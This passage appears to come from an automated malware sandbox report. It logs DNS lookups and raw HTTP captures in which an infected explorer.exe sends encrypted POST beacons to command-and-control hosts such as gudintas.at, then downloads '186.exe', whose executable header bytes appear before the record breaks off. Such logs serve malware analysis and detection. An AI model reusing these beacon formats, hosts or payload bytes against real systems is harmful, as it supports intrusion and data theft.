                                                                                                        Oct 3, 2023 18:05:13.119014025 CEST8.8.8.8192.168.2.30x63bNo error (0)gudintas.at190.224.203.37A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:05:13.119014025 CEST8.8.8.8192.168.2.30x63bNo error (0)gudintas.at211.171.233.129A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:05:13.119014025 CEST8.8.8.8192.168.2.30x63bNo error (0)gudintas.at186.13.17.220A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:05:14.750711918 CEST8.8.8.8192.168.2.30x8a9dServer failure (2)pik96.runonenoneA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:05:15.351339102 CEST8.8.8.8192.168.2.30x51a7Server failure (2)rosatiauto.comnonenoneA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:05:15.491332054 CEST8.8.8.8192.168.2.30x63a0No error (0)kingpirate.ru172.67.171.76A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:05:15.491332054 CEST8.8.8.8192.168.2.30x63a0No error (0)kingpirate.ru104.21.29.36A (IP address)IN (0x0001)false

                                                                                                        HTTP Request Dependency Graph

                                                                                                        • iyfrm.com
                                                                                                          • kingpirate.ru
                                                                                                        • fonbcdn.org
                                                                                                          • gudintas.at
                                                                                                        • wiygrw.com
                                                                                                        • jgmkwutmh.net
                                                                                                        • fcelay.org
                                                                                                        • ovwtbanhhy.com
                                                                                                        • vbuoguprst.org
                                                                                                        • wqhjt.org
                                                                                                        • pyecln.com
                                                                                                        • mpurr.com
                                                                                                        • upwicfou.net
                                                                                                        • wofwvlfk.com
                                                                                                        • h170811.srv22.test-hf.su
                                                                                                        • hnpeauvsal.net
                                                                                                        • fiancejiveimp.fun
                                                                                                        • rutca.org
                                                                                                        • 193.149.185.139
                                                                                                        • slodfljw.net
                                                                                                        • malenursenect.fun
                                                                                                        • dqstp.org
                                                                                                        • cymki.org
                                                                                                        • bdyds.net
                                                                                                        • vashlnsk.com
                                                                                                        • hwqywgiplc.com
                                                                                                        • mefip.net
                                                                                                        • kcdnqqhwdw.com
                                                                                                        • vyeap.com
                                                                                                        • kjhodokd.net
                                                                                                        • giswtqwpwp.com
                                                                                                        • fmvxkv.org
                                                                                                        • qcftd.com
                                                                                                        • swtffsdvpj.org
                                                                                                        • tkeyu.com
                                                                                                        • bxhcxj.org
                                                                                                        • wnprjuxp.net
                                                                                                        • goribni.org
                                                                                                        • knvwsy.com
                                                                                                        • dhqwmyg.org

                                                                                                        HTTP Packets

                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        0192.168.2.349934172.67.171.76443C:\Windows\explorer.exe
                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        1192.168.2.349806211.40.39.25180C:\Windows\explorer.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:02:19.552223921 CEST151OUTPOST /tmp/ HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Accept: */*
                                                                                                        Referer: http://fonbcdn.org/
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                        Content-Length: 358
                                                                                                        Host: gudintas.at
                                                                                                        Oct 3, 2023 18:02:19.552249908 CEST151OUTData Raw: 3b 6e 26 19 87 c2 1c 2e ac ab c5 71 0e 09 0e ca 78 0d cf e2 6a 71 e3 63 08 79 7a e5 43 c5 c6 19 ed 5a b5 2e 74 64 50 1b ec 98 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 52 35 ad f9
                                                                                                        Data Ascii: ;n&.qxjqcyzCZ.tdP?*$`7C[zqNA .[k,vuR5sNZ+L}vcKo%InLSw@/DuO*0No/)~hB(C3-.h}X>8ubW9=%^9
                                                                                                        Oct 3, 2023 18:02:20.682147980 CEST285INHTTP/1.0 404 Not Found
                                                                                                        Date: Tue, 03 Oct 2023 16:02:20 GMT
                                                                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                        X-Powered-By: PHP/7.4.15
                                                                                                        Content-Length: 8
                                                                                                        Connection: close
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Data Raw: 04 00 00 00 72 e8 85 ef
                                                                                                        Data Ascii: r


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        10192.168.2.349826211.171.233.12980C:\Windows\explorer.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:02:34.437017918 CEST322OUTPOST /tmp/ HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Accept: */*
                                                                                                        Referer: http://upwicfou.net/
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                        Content-Length: 201
                                                                                                        Host: gudintas.at
                                                                                                        Oct 3, 2023 18:02:34.437056065 CEST323OUTData Raw: 3b 6e 26 19 87 c2 1c 2e ac ab c5 71 0e 09 0e ca 78 0d cf e2 6a 71 e3 63 08 79 7a e5 43 c5 c6 19 ed 5a b5 2e 74 64 50 1b ec 98 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 02 6b 2c 90 f5 76 0b 75 7b 47 ac fe
                                                                                                        Data Ascii: ;n&.qxjqcyzCZ.tdP?*$`7C[zqNA -[k,vu{GEncpt(`Up%C;}ai:)3{6XJ?Gvbv-" v@x{19X
                                                                                                        Oct 3, 2023 18:02:35.304569960 CEST323INHTTP/1.1 200 OK
                                                                                                        Date: Tue, 03 Oct 2023 16:02:34 GMT
                                                                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                        X-Powered-By: PHP/7.4.15
                                                                                                        Content-Length: 0
                                                                                                        Connection: close
                                                                                                        Content-Type: text/html; charset=utf-8


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        100192.168.2.349925211.104.254.13980C:\Windows\explorer.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:04:42.497940063 CEST6743OUTPOST /tmp/ HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Accept: */*
                                                                                                        Referer: http://qcftd.com/
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                        Content-Length: 119
                                                                                                        Host: gudintas.at
                                                                                                        Oct 3, 2023 18:04:42.497973919 CEST6743OUTData Raw: 3b 6e 26 19 87 c2 1c 2e ac ab c5 71 0e 09 0e ca 78 0d cf e2 6a 71 e3 63 08 79 7a e5 43 c5 c6 19 ed 5a b5 2e 74 64 50 1b ec 98 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 5b 27 c1 e3
                                                                                                        Data Ascii: ;n&.qxjqcyzCZ.tdP?*$`7C[zqNA .[k,vu['~hI*2{%W16sNz
                                                                                                        Oct 3, 2023 18:04:43.755630016 CEST6744INHTTP/1.0 404 Not Found
                                                                                                        Date: Tue, 03 Oct 2023 16:04:43 GMT
                                                                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                        X-Powered-By: PHP/7.4.15
                                                                                                        Content-Length: 7
                                                                                                        Connection: close
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Data Raw: 03 00 00 00 72 e8 84
                                                                                                        Data Ascii: r


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        101192.168.2.349926211.40.39.25180C:\Windows\explorer.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:04:46.729911089 CEST6745OUTPOST /tmp/ HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Accept: */*
                                                                                                        Referer: http://swtffsdvpj.org/
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                        Content-Length: 288
                                                                                                        Host: gudintas.at
                                                                                                        Oct 3, 2023 18:04:46.729948044 CEST6746OUTData Raw: 3b 6e 26 19 87 c2 1c 2e ac ab c5 71 0e 09 0e ca 78 0d cf e2 6a 71 e3 63 08 79 7a e5 43 c5 c6 19 ed 5a b5 2e 74 64 50 1b ec 98 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 5d 21 c6 e9
                                                                                                        Data Ascii: ;n&.qxjqcyzCZ.tdP?*$`7C[zqNA .[k,vu]!I@DTd5vEQ-)'1;nAQ/U*10Ycg2L/2lShwwUt#YQw:(#ND~}G~*NB*R%v
                                                                                                        Oct 3, 2023 18:04:48.361164093 CEST6746INHTTP/1.0 404 Not Found
                                                                                                        Date: Tue, 03 Oct 2023 16:04:48 GMT
                                                                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                        X-Powered-By: PHP/7.4.15
                                                                                                        Content-Length: 7
                                                                                                        Connection: close
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Data Raw: 03 00 00 00 72 e8 84
                                                                                                        Data Ascii: r


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        102192.168.2.349927186.13.17.22080C:\Windows\explorer.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:04:51.741486073 CEST6747OUTPOST /tmp/ HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Accept: */*
                                                                                                        Referer: http://tkeyu.com/
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                        Content-Length: 242
                                                                                                        Host: gudintas.at
                                                                                                        Oct 3, 2023 18:04:51.741513968 CEST6747OUTData Raw: 3b 6e 26 19 87 c2 1c 2e ac ab c5 71 0e 09 0e ca 78 0d cf e2 6a 71 e3 63 08 79 7a e5 43 c5 c6 19 ed 5a b5 2e 74 64 50 1b ec 98 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 3a 27 f1 97
                                                                                                        Data Ascii: ;n&.qxjqcyzCZ.tdP?*$`7C[zqNA .[k,vu:'i=|J0mO*\'mO9Xyf@P:c_+Tzx`!7?^l:mH!Ee~4q1 g@nrO_{r-
                                                                                                        Oct 3, 2023 18:04:52.709985971 CEST6748INHTTP/1.0 404 Not Found
                                                                                                        Date: Tue, 03 Oct 2023 16:04:52 GMT
                                                                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                        X-Powered-By: PHP/7.4.15
                                                                                                        Content-Length: 7
                                                                                                        Connection: close
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Data Raw: 03 00 00 00 72 e8 84
                                                                                                        Data Ascii: r


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        103192.168.2.349928211.171.233.12980C:\Windows\explorer.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:04:56.701808929 CEST6749OUTPOST /tmp/ HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Accept: */*
                                                                                                        Referer: http://bxhcxj.org/
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                        Content-Length: 117
                                                                                                        Host: gudintas.at
                                                                                                        Oct 3, 2023 18:04:56.701833010 CEST6749OUTData Raw: 3b 6e 26 19 87 c2 1c 2e ac ab c5 71 0e 09 0e ca 78 0d cf e2 6a 71 e3 63 08 79 7a e5 43 c5 c6 19 ed 5a b5 2e 74 64 50 1b ec 98 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 5d 3c b8 aa
                                                                                                        Data Ascii: ;n&.qxjqcyzCZ.tdP?*$`7C[zqNA .[k,vu]<M]tA+n`4:Esq
                                                                                                        Oct 3, 2023 18:04:57.842614889 CEST6749INHTTP/1.0 404 Not Found
                                                                                                        Date: Tue, 03 Oct 2023 16:04:57 GMT
                                                                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                        X-Powered-By: PHP/7.4.15
                                                                                                        Content-Length: 7
                                                                                                        Connection: close
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Data Raw: 03 00 00 00 72 e8 84
                                                                                                        Data Ascii: r


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        104192.168.2.349929211.59.14.9080C:\Windows\explorer.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:05:00.666800022 CEST6750OUTPOST /tmp/ HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Accept: */*
                                                                                                        Referer: http://wnprjuxp.net/
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                        Content-Length: 349
                                                                                                        Host: gudintas.at
                                                                                                        Oct 3, 2023 18:05:00.666834116 CEST6751OUTData Raw: 3b 6e 26 19 87 c2 1c 2e ac ab c5 71 0e 09 0e ca 78 0d cf e2 6a 71 e3 63 08 79 7a e5 43 c5 c6 19 ed 5a b5 2e 74 64 50 1b ec 98 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 7a 57 a1 a0
                                                                                                        Data Ascii: ;n&.qxjqcyzCZ.tdP?*$`7C[zqNA .[k,vuzW\6vqdlT,y.2#Ewx18^NY'NC'@i`($-%n_z B*7wRwY6VRXb
                                                                                                        Oct 3, 2023 18:05:01.822751045 CEST6751INHTTP/1.0 404 Not Found
                                                                                                        Date: Tue, 03 Oct 2023 16:05:01 GMT
                                                                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                        X-Powered-By: PHP/7.4.15
                                                                                                        Content-Length: 7
                                                                                                        Connection: close
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Data Raw: 03 00 00 00 72 e8 84
                                                                                                        Data Ascii: r


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        105192.168.2.349930186.13.17.22080C:\Windows\explorer.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:05:04.301626921 CEST6752OUTPOST /tmp/ HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Accept: */*
                                                                                                        Referer: http://goribni.org/
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                        Content-Length: 204
                                                                                                        Host: gudintas.at
                                                                                                        Oct 3, 2023 18:05:04.301662922 CEST6752OUTData Raw: 3b 6e 26 19 87 c2 1c 2e ac ab c5 71 0e 09 0e ca 78 0d cf e2 6a 71 e3 63 08 79 7a e5 43 c5 c6 19 ed 5a b5 2e 74 64 50 1b ec 98 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 60 19 db 98
                                                                                                        Data Ascii: ;n&.qxjqcyzCZ.tdP?*$`7C[zqNA .[k,vu`XmF;qF{nh]5oBr&RYM!YA{4rOtxgyt^
                                                                                                        Oct 3, 2023 18:05:05.266510010 CEST6753INHTTP/1.0 404 Not Found
                                                                                                        Date: Tue, 03 Oct 2023 16:05:04 GMT
                                                                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                        X-Powered-By: PHP/7.4.15
                                                                                                        Content-Length: 7
                                                                                                        Connection: close
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Data Raw: 03 00 00 00 72 e8 84
                                                                                                        Data Ascii: r


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        106192.168.2.349931211.59.14.9080C:\Windows\explorer.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:05:08.562482119 CEST6754OUTPOST /tmp/ HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Accept: */*
                                                                                                        Referer: http://knvwsy.com/
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                        Content-Length: 262
                                                                                                        Host: gudintas.at
                                                                                                        Oct 3, 2023 18:05:08.562482119 CEST6754OUTData Raw: 3b 6e 26 19 87 c2 1c 2e ac ab c5 71 0e 09 0e ca 78 0d cf e2 6a 71 e3 63 08 79 7a e5 43 c5 c6 19 ed 5a b5 2e 74 64 50 1b ec 98 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 44 19 dc fa
                                                                                                        Data Ascii: ;n&.qxjqcyzCZ.tdP?*$`7C[zqNA .[k,vuD`FeQtwD('diwa;)uE_"[1cxYZ@eC6hA'";h`K#lqkj\[
                                                                                                        Oct 3, 2023 18:05:09.411051989 CEST6754INHTTP/1.0 404 Not Found
                                                                                                        Date: Tue, 03 Oct 2023 16:05:09 GMT
                                                                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                        X-Powered-By: PHP/7.4.15
                                                                                                        Content-Length: 7
                                                                                                        Connection: close
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Data Raw: 03 00 00 00 72 e8 84
                                                                                                        Data Ascii: r


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        107192.168.2.349932211.40.39.25180C:\Windows\explorer.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:05:13.407757044 CEST6756OUTPOST /tmp/ HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Accept: */*
                                                                                                        Referer: http://dhqwmyg.org/
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                        Content-Length: 209
                                                                                                        Host: gudintas.at
                                                                                                        Oct 3, 2023 18:05:13.407788992 CEST6756OUTData Raw: 3b 6e 26 19 87 c2 1c 2e ac ab c5 71 0e 09 0e ca 78 0d cf e2 6a 71 e3 63 08 79 7a e5 43 c5 c6 19 ed 5a b5 2e 74 64 50 1b ec 98 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 6f 02 a2 eb
                                                                                                        Data Ascii: ;n&.qxjqcyzCZ.tdP?*$`7C[zqNA .[k,vuoRMsaL8in@9eg<ks}S@8GyN~A)8JS"^?1MZ%
                                                                                                        Oct 3, 2023 18:05:14.507312059 CEST6756INHTTP/1.0 404 Not Found
                                                                                                        Date: Tue, 03 Oct 2023 16:05:13 GMT
                                                                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                        X-Powered-By: PHP/7.4.15
                                                                                                        Content-Length: 7
                                                                                                        Connection: close
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Data Raw: 03 00 00 00 72 e8 84
                                                                                                        Data Ascii: r


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        108192.168.2.349933172.67.171.7680C:\Windows\explorer.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:05:15.587486029 CEST6757OUTPOST /tmp/ HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Accept: */*
                                                                                                        Referer: http://iyfrm.com/
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                        Content-Length: 280
                                                                                                        Host: kingpirate.ru
                                                                                                        Oct 3, 2023 18:05:15.587523937 CEST6758OUTData Raw: 3b 6e 26 19 87 c2 1c 2e ac ab c5 71 0e 09 0e ca 78 0d cf e2 6a 71 e3 63 08 79 7a e5 43 c5 c6 19 ed 5a b5 2e 74 64 50 1b ec 98 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 51 2a aa ee
                                                                                                        Data Ascii: ;n&.qxjqcyzCZ.tdP?*$`7C[zqNA .[k,vuQ*xkB>-/h$i:WE.$4Bm2X]S5ag]o%8A-uMD"sH#$!
                                                                                                        Oct 3, 2023 18:05:15.696822882 CEST6758INHTTP/1.1 301 Moved Permanently
                                                                                                        Date: Tue, 03 Oct 2023 16:05:15 GMT
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: keep-alive
                                                                                                        Cache-Control: max-age=3600
                                                                                                        Expires: Tue, 03 Oct 2023 17:05:15 GMT
                                                                                                        Location: https://kingpirate.ru/tmp/
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Zyim57Rr%2F1YPyBRa%2Fy40iMiIjjiYesjJ4%2F%2FVyk5xNxTj%2FZh2%2BfP8Iz7hC3y7O59qC06VhJX1g1nMYASHDwk2OpKB%2Fw45LV%2BOep0%2Ff9cL6luW07H4CMX2uaFwMB4ii3IX"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 81066cf4acb12d0f-IAD
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        11192.168.2.349827211.171.233.12980C:\Windows\explorer.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:02:35.734071016 CEST324OUTPOST /tmp/ HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Accept: */*
                                                                                                        Referer: http://wofwvlfk.com/
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                        Content-Length: 261
                                                                                                        Host: gudintas.at
                                                                                                        Oct 3, 2023 18:02:35.734102964 CEST324OUTData Raw: 3b 6e 26 19 87 c2 1c 2e ac ab c5 71 0e 09 0e ca 78 0d cf e2 6a 71 e3 63 08 79 7a e5 43 c5 c6 19 ed 5a b5 2e 74 64 50 1b ec 98 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 03 6b 2c 90 f5 76 0b 75 43 24 b7 94
                                                                                                        Data Ascii: ;n&.qxjqcyzCZ.tdP?*$`7C[zqNA -[k,vuC$p?cFvAM-nbJh@g=.R8O5fQ1os~"y;n%kL%.1QxFo\mGycQ8
                                                                                                        Oct 3, 2023 18:02:36.849296093 CEST325INHTTP/1.0 404 Not Found
                                                                                                        Date: Tue, 03 Oct 2023 16:02:36 GMT
                                                                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                        X-Powered-By: PHP/7.4.15
                                                                                                        Content-Length: 51
                                                                                                        Connection: close
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 71 5a 3d 16 ac 69 5b b5 eb 55 e5 cc b0 e4 36 91 3d c1 b5 2b 5c 5b 9f 9f c0 9f 3c 82 70 10 0b 9a
                                                                                                        Data Ascii: #\qZ=i[U6=+\[<p


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        12192.168.2.34982891.227.16.2280C:\Windows\explorer.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:02:37.311343908 CEST325OUTGET /186.exe HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                        Host: h170811.srv22.test-hf.su
                                                                                                        Oct 3, 2023 18:02:37.535569906 CEST327INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.14.1
                                                                                                        Date: Tue, 03 Oct 2023 16:02:37 GMT
                                                                                                        Content-Type: application/octet-stream
                                                                                                        Content-Length: 3413536
                                                                                                        Connection: keep-alive
                                                                                                        Keep-Alive: timeout=20
                                                                                                        Last-Modified: Tue, 03 Oct 2023 15:46:04 GMT
                                                                                                        ETag: "341620-606d1c9d351f5"
                                                                                                        Accept-Ranges: bytes
                                                                                                        X-Power-Supply-By: 220 Volt
                                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 f3 d4 ac cf 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 50 00 00 c4 31 00 00 c2 01 00 00 00 00 00 1e e3 31 00 00 20 00 00 00 00 32 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 33 00 00 02 00 00 a6 70 34 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 0f 00 00 00 00 00 00 00 00 00 00 00 d0 e2 31 00 4b 00 00 00 00 00 32 00 18 bf 01 00 00 00 00 00 00 00 00 00 00 88 33 00 20 8e 00 00 00 c0 33 00 0c 00 00 00 6b e2 31 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 24 c3 31 00 00 20 00 00 00 c4 31 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 18 bf 01 00 00 00 32 00 00 c0 01 00 00 c6 31 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 33 00 00 02 00 00 00 86 33 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e3 31 00 00 00 00 00 48 00 00 00 02 00 05 00 68 44 04 00 00 90 0d 00 03 00 00 00 81 00 00 06 68 d4 11 00 1b 0c 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3a 2b 05 28 c5 cc 35 45 02 28 13 00 00 0a 2a 00 56 2b 05 28 bc 2c 0e 3f 00 02 28 14 00 00 0a 38 00 00 00 00 00 2a 00 00 42 2b 05 28 bf 1c 4a 3a 7e 01 00 00 04 14 fe 01 2a 00 00 00 36 2b 05 28 66 a6 36 61 7e 01 00 00 04 2a 00 00 13 30 03 00 a4 00 00 00 01 00 00 11 2b 05 28 2a ee 4d 65 38 1e 00 00 00 fe 0c 00 00 45 04 00 00 00 2f 00 00 00 4b 00 